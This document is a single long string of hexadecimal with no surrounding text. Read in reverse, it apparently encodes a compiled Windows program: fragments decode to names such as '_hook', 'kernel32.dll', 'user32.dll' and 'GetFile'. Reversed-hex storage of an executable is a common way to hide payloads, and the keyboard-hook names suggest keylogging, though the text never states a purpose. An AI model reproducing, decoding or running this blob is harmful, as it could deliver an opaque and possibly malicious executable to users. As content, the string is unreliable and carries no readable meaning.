3ACD009A5D691D4BEDDAACAADBCE009A5DA4472B5C2B5C009AECDBFBFEA4C94DDBFBFE009AEC297D3BCC9B5D986C009AEC987DDBFBFEDBFBFED2009A9CDBFBFE5A3CDAEBFEAA4C009A9CF86D3ACDCB3B1E25009A9C181DDBFBFE187D0AEC009A3CDBFBFEDBFBFEA96C25009A3CBBFDF95C389B3EBA2C009A3C987DEA3B6EDBFBFE6BEC009A3C58EC4ABCF95C3BBC008AED9AAD23DAEBFEDBFBFE008ABD685CC939DEC97D197D008ABC4B6DDBFBFEDBFBFE799D008ABCB93DA8B92E685C8BC9BE008A8CDBFBFE8BC9BE28FDC939DE008A8C4A3D3A0D75AB3D008A8C1A59683FF95CDBFBFE008A8C0AECDBFBFEF9FD9B28FE008A8CD9DD3B5CA93D18186E008A8C599D9AECA73A3C007A8DEB4C1B7DA96CA8B92E007A8DBBEDDBFBFEDBFBFE3ABD007A8D78889E0A8BCEDBFBFEDBFBFE007ACCDBFBFE181D4AACDBFBFE007ACC9AECDBFBFE9B4DDBFBFE007ACCD8A97EA4187DAA4C007A5CDBFBFEEB2CE97D393D007A5C5A3D393DDBFBFE9B4D007A5CC96CC98DDBFBFE387D007A5C79EDEA9CA96CE939AE007A5C987DF86D5BEC3B5C006A0D2A9C1BCCDBFBFEAACD006A0D284CAA4CCB3B1EDBFBFE005A3DDBFBFEDBFBFED98D69491E005A3DDBFBFEE87CBBA8BE685C005A3D04DBFBFEDBFBFEF82D005A3CDBFBFEF92D185CB4005A3C7ACCDBFBFE18186EAB3D004AEDDBFBFE4A8BBEC96CBA2C004AED7B9DFBAD987D982C004AED0B5DA7E578889E004AED9A3CDBFBFE5B9D25004AED599D2A9CB3987D004AEDA78ABC098B4EC8BD004AEDA56A0D8AED5B6D004A3D691D982CF9889EF95C004ABCDBFBFEF92DB93D6BEC004AAC8BC9BE5B9D3B5C55004A8BBEF9FDBBA8BEB989BEA8B92E004A5A2E4ABCDBFBFE986CDBFBFE004A5A2E4AAC2A2DABCBAE3ABD003ACD4B5CDAEBFE1BCC9B28FE003ACD18186EF92DA63BCC003A8D8ABDF82D08B97EB6003A8D485D5B9DA8B92EDBFBFE003A0DAB0A8E987D8A8CDBFBFE003A3CBA2CDBFBFE495C3A3C003A3C4A5A2E9AADBBFDDBFBFE003A3C181D293C799D78889E003A3CA40439ACDBFBFE002A2DABCBAE395CCB3B1E5B9D002A2D3BCCF9FDA92D36002A9CDBFBFE9AECDBFBFE389B3E002A9C29FCDBFBFE8ABCB4001AFD1AFDC86C3BCCD9DD001AFDD9DD2A9CF9889E4B6D000AECDBFBFE9B5D988DB6000AEC8AED24DBFBFE69491E000A8BCE9BED8ABDDBFBFE4B3C000A8BCE485DBBED3A0DDBFBFE000A8BCE284C5B9DDBFBFEB989BE000A8BCEA64A3D8ABDEACC00F9FDDBFBFE0B5DC94D69491E00F9FDBB5DE97DAACD28FD00F9FDBA3C19ECDBFBFEDBFBFE00F92DFBAD9BCDDBFBFEEA9C00F92D5BECF92DFAEBAE9600F92D0AEC4B6DF95C4AED00F92D239B28FEDBFBFEAAAC00F96CDBFBFE9A9C3ABDC84D00F96CDBFBFED8A97EAA4CE500F96C3B5CA5DBFBFE7A5C00F96C7A5CABCBAEB93D9AEC00F96CA99D8ABCDBFBFEEAEC00F95CABA9790FF95C3A0D00F95CB64A5A2EEA0D187D00F9889EDBFBFE4A5A2E08B97EDA2D00F9889EDBFBFE185C79EDDBFBFE00F9889E3B5CC88DDBFBFEDBFBFE00F9889E3A0DDBFBFE38594E9AAD00F9889EE97D5B6DDBFBFEBBED00E97DDBFBFE28FD792C3A0D00E97D2A9C19EC75A93D00E939AEEAECDBFBFE9B784EDBFBFE00E939AE8A8CEAECAADBCE6BDD00D9DD4BED4ABCC8BDD9DD00D9DD185CDBFBFE5B68CB3F00D98DDBFBFEAB0A8E185C89FC00D98DDBFBFEE97DDBFBFEDBFBFE00D98DBBA8BEDBFBFEDBFBFE2300D98D3ABDDBFBFEBB5DC939DE00C98D0B0A3E39AC6A0D6A0D00C98DC98DDBFBFE580D393D00C98D284CDBFBFEDBFBFE5BEC00C97DDBFBFEABABE92FDBFBFE00C97DE5DBFBFEA6A99D00C94D9B4DDBFBFE25DBFBFE00C94D68BABE3BCC799D389B3E00C94DD6D6485DA93D00C96CDBFBFEBBA8BEDBFBFEB99C00C96C5BEC8AEDF82DDBFBFE00C96C4B5C4A5A2E484A293F00C939DE293CDBFBFE9A5D3400B99C0B5D24CA09CEDBFBFE00B99C0AECEACC4A3D599D00B99CC96CD98DDBFBFE2B5C00B99C78889EDBFBFEE939AEC8BD00B989BE9A3C1A2DDBFBFE38594E00B989BE0AECD608B97E29FC00B989BE789C3ACDDBFBFEA96C00A9BD9B28FEF86D185CDBFBFE00A9BD6A0DDBFBFE0B5DA93D00A9BD792C6BDDDBFBFEDBFBFE00A99DDBFBFE89FCDBFBFE9A9C00A99D4AEDDBFBFEDBFBFE2A2D00A99DC97D987DE85CF9889E00A99DA93D6BDD691D4AED00A93DBBA8BE68CCEAEC9BED00A93DD6181D0AECF9889E00A92DDBFBFE8A8CDBFBFEAACD00A92D1B5B5E18186EC939DEC97D00A96CDBFBFEA64A5A2EEB4C00A96CC96CDBFBFEA96CDBFBFE00A96CA93D9B28FEC86CDBFBFE00A92AB82F297D49CC9B4D00A9C9491F29FC5B6D1B5B5E00A928682F2B5CDBFBFEA92D00994CDBFBFE28FDDBFBFEDBFBFE00994CDBFBFEB33BBC230079EDDAACF9FD181D187D00799DD98D3A3C39AC6A0D00799D395CDBFBFEDBFBFE8ABD00799D24DBFBFE9BCDDBFBFE00792CFBADA95CAA4CFBAD00792C4B3C9AAD187DBA2C00792CD98D8A8C4A5A2E2B5C00792CC94D79ED185C1BCC00792CA99D297DA96CC98D00792C987DAAAC098B4E38594E00792C187DDBFBFEAB0A8ED8A97E00792C24595D9AECA93D00691DDBFBFEDBFBFE3ACDBA2C00691DEAECDBFBFE18186EDBFBFE00691D4AAC580D6BEC39AC00595D1B7DDBFBFE1BCCDBFBFE00595DE939AE6A0D284C1A2D00595D364B5C8AEDF9FD00495CDBFBFEDBFBFEF95CC86C00393DDBFBFEA92D5A3C4ABC00393D9BED994CDBFBFEE85C00393DDAEBFE1BFCDBFBFE1A2D0039ACDBFBFE25A58BC9BE00395C691DD2A6F82D00395C28FD799D181DDBFBFE00394CDBFBFEF92D6BECDBFBFE00394C19EC7A8DE5DBFBFE00297D185C29FCFAEBAEBAFC0029FCE97DFBAD9BCDEAEC0029FC185CAB3DDBFBFEC88D00293CA96CAABA3B3FDBFBFE00293CB4DBFBFE691DB600293CB34A3D19ECDBFBFE00197DDBFBFE364A3D49CC00197D691D4AED19ECDBFBFE00197D39AC685CD2AAAC00197D986C3ACD5B9D68CC0019ECDBFBFE29FC08CCBA2C0019ECBBFDDBFBFE1B5B5E982C0019EC9A5D9A5DDBFBFE595D0019EC3A3CDBFBFE19EC040019ECD98D4A3DDBFBFEABCBAE0019EC799D8AED9A3CBAFC0019EC29FC5BEC0B5DC97D0019EC485DAB3DDBFBFEDA2D00098B4E393DB99C6A0DDBFBFE00098B4E197D49CC389B3EEA0D00098B4E988D986C185CC88D00F86DD8A97ED9DDEA3B6E197D00F86D08B97E1BFC7A5C68CC00F82DBBFDDBFBFE181D0A8BCE00F82D3A0D4B3CC96CDBFBFE00F82D34F95C185C19EC00E87CDBFBFE6BECDBFBFEDAAC00E87C4BEDDBFBFE19EC8A8C00E87C8ABD789C5BEC9AAD00E87C7A8D341AFD68BABE00E85CDBFBFEBB5D4B5C389B3E00E85CDBFBFE9B28FEB989BEDBFBFE00E85CDBFBFEC939DEE87C9A3C00E85C47DBFBFE58EC8BED00D8A97EDBFBFEDBFBFED66BDD00D8A97EDBFBFE9B784E0A8BCE2300D8A97ECB3B1EDBFBFEFAEBAEAB3D00D8A97E3A8D0B0A3E39ACC8BD00C8BD4B6D8ABD1BCCDBFBFE00C8BD7A5C7B9D6A0D8A8C00C8BD4ABCBA3CDBFBFE4ABC00C8BDF95C4BEDEB4CFAEBAE00C8BDF9889E789CE97DDBFBFE00C8BDD98DDBFBFE1A2DAB0A8E00C88DDBFBFEDBFBFE9B784E2B5C00C88DC88DDBFBFE18186EDBFBFE00C84DA9BDDA2DA99D394C00C86CA4297DDBFBFE28FD00B87A3B3FEB4C3ACDC94D00A8B92EDBFBFEAACD3BBC3A8D00A8B92E621BCC8A8C7B9D00987DDBFBFE4ABC25AB0A8E00987D599DDBFBFEA95C5BEC00987D284C9B784E0B5DEA3B6E00986C1BFC395C9BCD9B4D00986C4AACC98DC98D19EC00982C1A2D685CEA9CDBFBFE00982C19ECDBFBFE1A2DDBFBFE00789C8BC9BE685C0A8BCEA500789C2A9CDBFBFEF92DDBFBFE0078889E4A3DBA2C89FC9B28FE0078889EC88DFBADBBA8BE2A9C0068CC7A8D293CDBFBFEA9BD00685C68BABEDBFBFE393D9B4D0068BABE9B4D3ABDBBA8BE1BFC0068BABE1A2D2A9CDBFBFE7ACC00580DDAEBFE789C34C88D00580D297DDBFBFE792C78889E00580D187D79ED4BED580D0058ECDBFBFE6A0D7ACC8BC9BE0058ECE85CEB4CDBFBFEE87C00485DD229FCEACC9600387D4A3D8ABD9BED9B5D00389B3E5A3CB989BEA6E87C0028FDAACD7ACC9AEC599D0028FD69491E2B5CDBFBFEDBFBFE0028FD19EC4A3DDBFBFE387D0028FD78889E3BCC7A5C297D00187DCB3B1E685CBBFD9BED00187D3BCCDBFBFE4B5CE85C00187D4AED36297D7A5C00181DAB3D5B6D297DDBFBFE00181D96049A3CD98D00185CDBFBFEDBFBFE4848D90F00185CDBFBFE75DBFBFEDBFBFE00185C293C1AFD9BCDEACC0018186EDBFBFEB93D395CB30018186E2BCCB99C387D8BC9BE0008CCB989BEAAAC08CCDBFBFE0008CCA92DDBFBFED98DDAAC0008B97EDBFBFEF92D7A8D4B6D0008B97E0B5D293C485D3A8D0008B97EFAEBAE389B3EAB0A8EE939AE0008B97E0AECC97DB3DBFBFE0008B97E393D96DBFBFE62009787F6270537569627F6473656279644C6169636560735009787F62705D6564737973556C69664009787F62705462716F6260796C634009787F62705265675D65647379735475674009787F6270526567594009787F62705F5475637009747275607F62705475635470797273424009747275607F6270547567447079727342400974707D654009747962757365635E24756E4E2D65647379735009747962757365635E2D6564737973500974796C616571756E694F507F600974796C616571754F507F600972747379676562500972747E656F52756473716D6F5564796C6173700972747E656F556C6261647009727F6473656279644564716562734009727F6D656D4C616369637978605C61647F645F547567600972716272696C45656276400972716272696C44616F6C4009707F634B636F6C6240097C6079647C657D40097C626D656373714F547567600978607162776F64707972734E29747962757365635E2D65647379735009756B697669647E6564694009756B49727473796765625009756B497F62747375644470797273424009756B44727F607D694470797273424009756B437375636F62705009756B437E6961647E6F634009756B4C61657472796650716D4009756B4265735E65607F4009756B4F5475637009756B4F5475676009746F624F54756370097461656253794F54756760097162727149707F634009716272714F64500971627271456A796C616964796E69400971646F645F54756760097164466F456D69645F5475676008756C607D6F634475635564716C4008756765625008736008754B6F6F684478756E4C6C61634008754B6F6F6843777F646E69675B6F6F686E6550087545646F63696E655F6450077F646E696757756E6F50077F646E6967547E65627275736F50077F646E6967547E65627275734F54756760077F646E69675F6E4564716562734F54756370077F646E6967546E657F627765627F6644756740077F6E4F54756760067960047875647E6F6343616D426070047875647E6F6343616D42636004787564577F646E69675475674004787564547567400478756452756E6E694F54756760047875645C6C614461656250047875645E2D6564737973500478756E45667F6D4004757074757F446271646E61647354736562796465625F5475637004757074757F446271646E6164735F547567600475707E69446271646E61647354736562796465625F5475637004757F69716C4462716F6269756B4475674004737F684972437C6169647E656465627349400473796C45646F6E4C6D6850047375657175625265675074747840047375657175625265675074764004727F605F54756370047275667E6F6340047275637E694004727164735461656278645004707972736E6544707972734240047079727365644470797273424004707D6F62705A737004707F4D65647944757F6004707F416E65627160047E657F6363614E6F69647163696C60707144656275667F63656250047E657F634F54756760047E696F6050047E656675407559756B40047E6566754E677F6449756B40047E65647E6F6360047E65627275734F54756760047E6562716054756740047E656271605F54756760047E656E6F607D6F6340047E656D65736F644C6D6850047E656D6E6F6279667E6540047E656D68636164747140047E656D65647164737F5C617370047E656D6562736E69477460047E656D656C654C6D6850047E65696C6340747D6350047E65696C6342656750047E6940047C6573756270047C65737562536E69737145647167656C656440047C65737562536E6973714940047C65716665644F54756760047C616352636004796875427F66447961675004796C607350047963696C6078754F507F600478676965684F5475676004786769625461605004756E4E2D6564737973500475674564716C40047567456C696640047365647F62707E65500473656A6265735F547563700473656A626F447567627164500473656A626F4473616274726573500473656A626F4564716E656471636E6F63400473656A626F44656E6E6960566F42746461400473656A626F44646140047361687545637271605004736162747265735004716D627F66400471636E6F6340047145667F6D6562500379756B6F500379756B400374737F6844656C62616379646F547563700374737F6844656C62616379646F547567600374737968754003747E656D657762714F5475637003747E656D65736F64497D4F5475676003747E656D6863616474714F54756760037375627464614C69616D4003737562746461436F627054756740037375636F6270547E656272757344756740037375636F62705479687540037375636365735F547567600373756363614E65607F4003727F64716275607F4003727F6272754973696C6F605C637350037275607C6568456D69647E657250037275646165684F5475676003727168634F547567600370757F62774F54756760037E6F6964707F487567656250037E6F696473656C6C6F634E2D656473797350037E6F696373756270787542716C657765625E247875645E2D656473797350037E6F69637275667E6F6340037E6F69637E656478754E2265675E2D656473797350037E69676F6C6F54756370037E69676F6C6F54756760037E69676F6C464640037E6961647E6F6340037D627F66497D40037D627F664E23777F646E69675E2D656473797350037C69647550037C6165717545636E65627566656250037C6169647E65646562734B627F6774756E447C65716665644F54756760037C6169647E65646562734F54756370037C6169647E65646562734940037B6369645F5475676003776271447E656675427567676F6C49756B4003776E69627473500377616C664774600377616C6644707D6F62705774600377616C6644707D6F6270547365647F62705470797273400375667962744475674003756479724475674003756479724C6C614461656250037564716369666964727563493035385E2978607162776F64707972734E29747962757365635E2D6564737973500375637375636F62705475674003756D616E49756B4265735475674003756C696644756740037569627F64736562796444756740037569627F6473656279644C6169636560735F547567600375686364716D400375646F6D476E696767657265644003756362757F6375627E23756362757F6375625E2A41446570595448674E664D6C6A57555867766C6003756362757F6375625E2D6564737973500375636966727563597D4E23696371624C61657379665E24766F637F6273696D40037563696672756352756C69607D6F634E256D69647E65725E2D656473797350037563696672756352756C69607D6F634E23696371624C61657379665E24766F637F6273696D400375636966727563507F6275647E694E256D69647E65725E2D65647379735003756369667275635E6F69647163696C6070714E23696371624C61657379665E24766F637F6273696D400375636966727563526567597D40037563696675644E23696371624C61657379665E24766F637F6273696D4003746E657F624F5475676003736964737F6E676169644E2D6564737973500373696860716277400274735E6960027470547E6940027F64707972736E6545647165627340027F6470797273656445647165627340027F6473636E20027F64736E20027F6471667964736140027F647162756D657E6544756740027F647162756D657E654940027F6272754473656A6F627054756350027F6272754473656A6F62705271656C6340027F6272754473656A6F627055647165627340027F627275446271646E61647354736562796465625F54756370027F627275446271646E6164735F547567600279646769666E6F636002756A796C61696275635470796273635166716A400275677F6C4F645002756475707D6F63427566727563500275647275667E6F63447962400275647E696F605E6F6964736E6576427F6645647167656C65644475674002756375547E65627275734002756070755F645002756D69645002756C69607D6F634E2D6F6445646F634E2D65647379735002756C646E6168447E65667543776271447E656675427567676F6C49756B40027567676F6C49756B4002756765647E694F6450027567616E616D447E696F605563696672756350027567616E616D456362757F63756250027566666572400275646E6563700275646C6F664C616963656073500275646C696572476E696274735002756469667F627054716D627F66494002756469667F62705D686479627F676C614E65607F4470797273424002756469667F62705D686479627F676C6145637F6C634470797273424002756469667F6270556369667275635F6470797273435544456C607962745002756469667F6270556369667275635F647079727345344D400275646165625D616562747350027564616562576E6962747350027168634F645000757F627740007071446E6778600075656C635000716D64796240007559756B4F55667F6D656270007559756B4F546461600F62756A500F666E6949727F647365627964400F666E694472716473537375636F6270500F666E6944727164735F547567600F666E6942756475707D6F63400F666E694D6564737973556C6966400F666E694566796274400F666E69456275747C6573400F666E69456C6966400F666E694F547567600F64556271607D6F63400F645F547567600E677F6449756B44766968635F547567600E677F6449756B4F55667F6D6562700E677F6449756B4F546461600E6572500E6F6279667E65400E6F6964707563687542756E6E694F547567600E6F696470756368754E6F6964716275607F44696C61667E69400E6F696470756368754E6F696471636F667E69447567627164500E6F69647075636875436968607162776F6470797273400E6F69647075636875426567500E6F69647E65667E6F63476E696C6C6163400E6F696479637F605F547563700E6F69647365627964600E6F696473656C6C6F63447E656D686361647471400E6F696473656C6C6F63437375627464614C69616D400E6F696473656C6C6F63427564616568426567500E6F696473656C6C6F6340757F6277400E6F696473656C6C6F63486364716D400E6F696473656C6665625E2D6564737973500E6F696473616275647E69400E6F6964716A796C61696275635E2470796273635E2265675E2D6564737973500E6F6964716A796C61626F6C674E2D6564737973500E6F69647162757769666E6F634E2D6564737973500E6F69647163696C607071400E6F69637275667E6F63400E6F69637275667F547563700E6F69637275667F547567600E6F69637275665F666E694774600E6F6963727566535F4F547567600E696F6A400E6961686349303538500E69616D400E67696375644E2C65646F6D447E656E6F607D6F634E2D6564737973500E65607F456C6966400E65656273635D6F627649707F63400E65656273635F547567600E656C4E69600E656C4D656479434543500E61656C6F6F62400D6DBFBFEB989BE0A8BCEDBFBFE00D69B784E8ABC0B5DDBFBFE00D67ACCDBFBFE5A3D2300D6389B3E789CDBFBFEDBFBFE00D657E6F547F6F62700D657E65400D627F66637E6162745F647079727349400D627F66400D6F62764F547563700D6F646E6162500D6C616562707474786F547563700D6C616562707474786F547567600D6962745C400D686479627F676C6148637168400D686479627F676C6143696274756D6D6973500D6564737973556C69664F547567600D6564794F547567600D65647943454354500D616562747359727F6D656D400D616562747354737565717562547567400D616562747355637E6F60737562547567400D6165627473556C6966400C6373556C62616E654F547563700C62757F547563700C62757F547567600C6F62747E6F63400C6F636F647F627059747962757365635F547563700C6D685E2D6564737973500C6C696B400C6C646E247079727362600C6C646E2C6C64647E600C6C646E22333470797273400C6C646E223332756375700C6C646E22333C656E62756B600C6C61634564716C400C69616D4E24756E4E2D6564737973500C65646F6D447E656E6F607D6F634E2D6564737973500C65646F6D4473656A626F4E237E6F696473656C6C6F634E2D6564737973500C6562616C4260700C6562616C4263600C61667275647E694F547563700C616571754473656A626F456271607D6F634C616E6F696479646E6F63400C616D69636564400C6169647E65646562734B627F6774756E400C61686372716D400C61626F6C674845656276400C61626F6C6748436F6C6C61400B69B4D6BEC3AD9182F00B6F6F686F500B6F6F684478756E4C6C6163400B6F6F68447563500B6F6F684E65500B636F6C6E655C61626F6C67400B636F6C624C616E69664D627F66637E616274500B636F6C437071634F547567600B636F6C4C61626F6C67400B6369645F55667F6D6562700B6369645F546461600B6361626C6C61634E6F69647164696C616655647163696669647275634275667275635F547563700B6361626C6C61634E6F69647164696C6166556471636966696472756345647F6D6562500B6361626C6C61634B6F6F686F500B6361626C6C616345647167656C6564400B6361626C6C6163436E697371400A6DBFBFED9DDE51BFC00A6A8B92EDBFBFE9A9CC84D00A6387D187DC84D394C00A626F60096DBFBFE9B28FE6BDD79ED0096DBFBFE08B97E284CDBFBFE009629FC3ACD6BEC040096E65576E696274735F64527470500864796753746E65400864776E656C48716D4774600864776E656C447E65647E6F634F547563700864776E656C4E696D4774600864776E656C4F5475676008647469675F54756760086471605275646C6F664475674008647160556C62616475736568754F547567600864716D4008637168456475707D6F6340086364716D40076E69677162744E2D656473797350076E6962747372657350076E6962747354756740076E696274735F6450076E69627473556271607D6F6340076E69627473556362757F63756254756740076E696274735436356371624F6450076E696274735436356371624D6F627640076E696E6F69637275665E256D69647E65725E2D656473797350076E6967676F6C4E6F6964707163456A796C616964796E6940076E69646F636E6544756740076E69646F636E654F54756760076E69646F636E654836445550076E69646E69624564716C47756E40076E69646461605F54756370076E696461656278645E2D656473797350076C616007616470076164526070076164526360066F4875646E694473716C40066F4D6564794F54756760066F456A796350056A796370056A796C616E6966437375627070757350056A796C616964796E6940056A796C6169627563756440056A79635C61647F645F54756760056A79635263600568756E2A41446570595448674E664D6C6A57555867766C6005667F6D656250056671635005657E69647E6F634030313473656078754F5475637005657C616659747275607F62705F6475714005657C61665475635005657C61665475674005657C61665473656A626F4475674005657C6166576E696274737F5005657C6166576E696274735F5475676005657C61665369647164735461656278645F5D6005657C61665F547567600564797240056475736568754C6C6568635563755F5475637005647572696274747149747275607F62705867657F6278645465637375636361400564757269627474714974796C6962696471607D6F63456D69647E657250056475726962747471497E61607D6F63497C626D656373714005647572696274747149716272714D6162716050056475726962747471447867696279707F63497C626D6563737140056475726962747471447365746F6270597C626D6563737140056475726962747471437E6F69647168716C65625E6F6964716C69607D6F63400564757269627474714377616C66400564757269627474714275647E696F605E6F6964736E6576446567616E616D6E65500564757269627474714E6F696470796273637564497C626D65637371400564757269627474714E6F696473656C6C6F6340757F6277497D400564757269627474714E6F6963727566556C6966497C626D65637371400564757269627474714E65646469684275676765726564400564757269627474714B627F67756D616276447567627164500564757269627474714B62716D6564616274597C626D65637371400564757269627474714564756C6F63726F40056475726962747471456D616E456C65746F6D4564696840056475726962747471456C65746F6D446271646E61647350056475726962747471456C647964597C626D6563737140056475726962747471456C62696379665D6F6340056475726962747471456C626163777F6272427F6479646540056475726962747471456C626163777F6272427567676572656440056475726962747471456C62616767657265644005647572696274747145646F63427563755E6F6E42756767657265644005647572696274747145646F634465647162756E65674005647572696274747144627F6779756B407C65684005647572696274747144696577400564757269627474714465647162756E656742756C69607D6F634005647572696274747144616562786451445350056475726962747471436964716473546165627864500564796277500564756C6564400564716473556C626163777F6272427F64796465400564716473556C626163777F627242756767657265644005647164735462716F6269756B447567400564716473536E69737145647167656C65644005647167656C656449756B4005647167656C65644473716369647C657D4005647167656C65644E6F6964736E65764C4C44400564716562734005647163696669647275634930353850056372756675625274735005637F607379644005637F6C63456C69664005637E6F607375625475674005637E6F607375625265675005637E6F607375625F54756760056371634C400563716243776E69647475635E6F69647163696C60707140056371624E6F69647163696C607071456C6F637E6F63400562757470716340056275747C6573447E61696271667E694F54756760056271607D6F634005627168635E65607F40056079747F5D656479600560797454756740056079745D65647943454350056079745C6F636F647F62705974796275736563500560797455657C61665005607974556C646E61684347400560797455676E6168634005607974536E656F5475637005607974536E656F5475676005607F63635E6F69647365647F62705164716440056E696863616D4C61636F6C40056E69626D6F6340056E696C456479627750056E696C4461656250056E6F40056D69645564716440056D6964546E614564716440056D616E64737F686F54756370056D616E64737F686F54756760056D616E627563757F50056D616E62756375546564707972736E656F54756370056D616E62756375546564707972736E656F54756760056D616E6F5D65647960056D616E6F556C626164737160056D616E49724375637375636F627054756740056D616E437375636F62705F54756760056D616E427563755F54756370056D616E427563755F54756760056D616E4070716F54756370056D616E4070716F54756760056D616E4C6C65764F54756760056D616E4C6C6576435F4F54756760056D616E476164597243747E656D656C6544756740056D616E456E696863616D4F54756760056D616E456C69664F54756370056D616E4F54756760056C697473577F646E6967537375636F627050056C697473577F646E69675F54756370056C6F637E6F6340056C696640056C676E616473656250056C646E61684D6F62764560797454756740056C646E616845607974556D69647E657250056C646E6168446C656966456D69647E657250056C646E6168434740056C62657F6440056C6261647863716840056C6261637F607379644940056C62616C6961667144716D627F664462716F6260796C63437940056C626169627166547E656D6E6F6279667E6544756740056B6F667E694E6967656240056B6F667E69446E654005686361634C6169647E65646562734005676E6168636875456271607D6F634005676E6162546461400567616373756D4C69616D400567616373756D4F547567600567616D694D6F627640056562764005646F63696E655F6455646F634B465005646F63696E655E6169646E654769624F5475676005646F63696E655F5475676005646F6E4C6D685005646F6D4275686079634005646F6D4E65607F4005646F6D476E69646461605005646F6D456C69664005646F6D4F5475637005646F63486371684475674005646F634B465005636E6F6E42607005636E6F6E42636005636E6164737E696005636E6164737E694475674F5475676005636E6164737E69456471656273400563616073500563616C6075625004627F67737371607F5004627F6773737160546564707972736E656F5475637004627F6773737160546564707972736E656F5475676004627F67737371605F5475637004627F67737371605F547567600462716F6269756B4F547567600462716F6260796C634E65607F400462716F6260796C6345637F6C63400462716F6260796C634F54756760046F6864756D44756762716450046F6864756D4F54756370046F6D4840046E657F6250046E696B45657C6166597274737967656250046E6560707140046E656350046E654F645461656250046C6569666F5275646165686F54627F63656270046C656966456D616E627563757F54756370046C656966456D616E627563757F54756760046C65696644627F67737371607F54756370046C65696644627F67737371607F54756760046B616B656B616B656750046965776F54756370046965776F5475676004696F577F627004696F5475637004696F5475676004656A796E6F6278636E69735004656471656273476E6965624D627F664F5D6004656471656273456D69647F5475637004656471656273456D69647F547567600465637F6073796443794F54756760046563755473716C456D69647F54756370046563755473716C456D69647F547567600465637553756D69647F547563700465637553756D69647F5475676004656B636F6C6275647E69400465676E61686344627F6773737160556D69647F547563700465676E61686344627F6773737160556D69647F547567600464614004616F6C4004616562786450046165625E65607F400461616004694478756E6F5475637004694478756E6F547567600469437375636F6270546165627864577F646E6967547567400469476C614A7370700469446165627864500369BCDDBFBFEC98DAB3D00363A3C599D68BABE58EC0036F62705462716F6269756B40036F6C6C614003696371624C61657379665E24766F637F6273696D40036962756E65674E237E6F696473656C6C6F634E2D65647379735002696C627F63637D600164746E676F6C416467646E69637863776F6C61616160016471646001647164447365647F62707E65547079727340016471644473656A6F627050016471644D6564794345435001647164486475714260700164716448647571426360016471644462716F6260796C6344756740016471644465647365647F6270500164716444616F6C60755001647164426070016471644263600F5F55657C6166700F5F55636E6164737E694F5F556471656273400F5F55636E6164737E694F5F55637F60737964400F5F54256275737F6C634F500E5284C3A3C8A8CDBFBFE00A54B3C9A3C4ABCDBFBFE00A50A8BCEABCBAE19EC2A9C00A5F86D0AECDBFBFEDBFBFE00A5181D47A9BD9B784E0075DBFBFEA92DB6A99D0075A99D8AEDDBFBFEDBFBFE007508CC098B4E0A8BCECB3B1E0075875456C696645667F6D40075278634006594F54756370055E939AE14D98D6BDD0055098B4E8BC9BECB3B1EB99C005508CC38594E387D8AED005523DBFBFE5B9D3A8D00453455254535F535844574E454C4F59554B4F5450595253424004534552545354505D4F42505F545345445F4250545059525340045345445F42505F5E4F4F54505D4F42505F545345445F4250545059525340045345445F42505E455F5E4F4F54505D4F42505F545345445F4250545059525340035544456C6079627450025DBFBFEBBED5A3DAACD0025DBFBFE58EC1B5B5E18186E00251B7D4ABC8ABDC97D00F4DBFBFEE87CDBFBFEA92D00F494E2D6564737973500F464E494F574E49444441405F5353505F545059525342400F464E494F574E49444441405F5055414F4F545059525342400F464E494F55444F4D4F5255484059434F544544514349445E45484455514F545059525342400C425554796D6265735D627F666F547563700C425554796D6265735D627F666F547567600C42555F547563700C42555F547567600B4DBFBFE1BCC0AEC4A5A2E00B43B5C5B6D187D982C00B4DAEBFEB93DCA09CE3B5C00B4297DABCBAE4B3CF9FD00B4988D0B0A3EF82DB989BE00A4DBFBFE9B784EC84DC88D00A4DBFBFEC939DE9AAD1BFC00A4A7297D5B9D3BCC00A41446570595448674E664D6C6A57555867766C6009494343514F54756760094420064F4C40044141426360034BB5D9B5DBBA8BEDBFBFE0034ABCBAEC94DA93D2B5C0034595D197D4B3CDBFBFE00347400245A3D751438594E0024994C986CC88D9A5D002468BABE986C79EDC97D0024F4C424F5144514440014CB3B1E691D4BEDDBFBFE0014BA2CA5DBFBFE9BED0014C98DDBFBFED2389B3E00148754B6F6F6843777F646E69675475635001456D616E456C6966456C65746F6D447567400049A5D2318186E9AEC00049AEC2BCCEA3B6E1BFC0004B3A92D293C2300B3A96C5BEC4AACDBFBFE00B3C8BDF86D9B28FEB400B3685C5BECBA3C0400B3485DDBFBFE9668BABE00B328FD47986CA95C0083644555F547567600635647167656C65644E6F6964736E65764C4C4440063532314843500631347E69455F64500535647167656C65644E6F6964736E65764C4C44400435647167656C65644E6F6964736E65764C4C44400436347E694F64500436347E69455F64500233347E694F64500233347E6945500233327563757002333E69675E24766F637F6273696D4002333C656E62756B6002333D356A79635560797454796E6949716272714369647164735F5F5001306473796C40013062756469667F62705473656A626F456661635461656278645001306E6F696473656C6C6F63400130656C626162756D657E65494001313D356A79635560797454796E6949716272714369647164735F5F5000313D356A79635560797454796E6949716272714369647164735F5F50003D22323F5F542164626D616C4F50003D2032313F5F542164626D616C4F50003D2032313944200D2DBFBFE5B6D9BEDDBFBFE00D2F9FD8ABC988DA700D2580DF9889EBBA8BEDBFBFE00629B28FE986C29FCDBFBFE00624BED1B5B5E8A8C293C00624B6DAAACABA8B92F0062F92D599D3ACD4B5C000000001A0030001A002041BE20AA418B20AA41093090219820A0E00420B090240076807F0076408420BA00000000408420B000000000408400B200000000408400920001000040840051000000004084003100010000408400E00001000000B200E200B200D200B200C20032008200320072003200620032005200320042000200220002001200C100F100C100E100C100D1007100B1007100A100710091007100810011005100110041001100310011002100B0000100E000F000B000E000B000D000B000C00040007000400060004000500000D136000000100000000000000000F15241240000000000000000000000400000000052FE001000000000000000000000004000000000212B00100000000000000000000000400000000051B800E000000000000000000000004000000000E10E00E000000000000000000000004000000000616200E000000000000000000000004000000000509B00E00000000000000000000000400000000050DD00100000000000000000000000A0000020A9000000000000000000000000001000000840007A00000209006A00000207005A00000206004A000002050070410520FE10000070414220DE1000002080A220BE100400208093209E10040020905E207E1000002050B4205E10000070528720FA100400100250209A1034007052C6207A1000006050A8109E1064005022D810F61034005022B910D610340050526010B610340050426F10961034005062B21076103400506291105610340050A123103610340050A1F410161034004042C210731034004042041053103400402030103310340020421D001D10000020D0E600FC10000020420200DC10000040329000BC1034002060E2009C1034003070A6007C1004002032A9005C1000002032DC003C100000104028007710340010F17E005710340010100F0037103441C94169316E317C31CB3137F036F025F010D0EBC0D990F39083805D808A801A80A9803980C851D4515651B71022511751A51090003010470031003010C400E000F51017001000F51007002000D510F6001000D510E6002000B510D6001000B510C60020009510150010009510050020007510F40010007510E40020005510D40010005510C40020003510B40010003510A4002000151094001000151084002000F41074001000F41064002000D41054001000D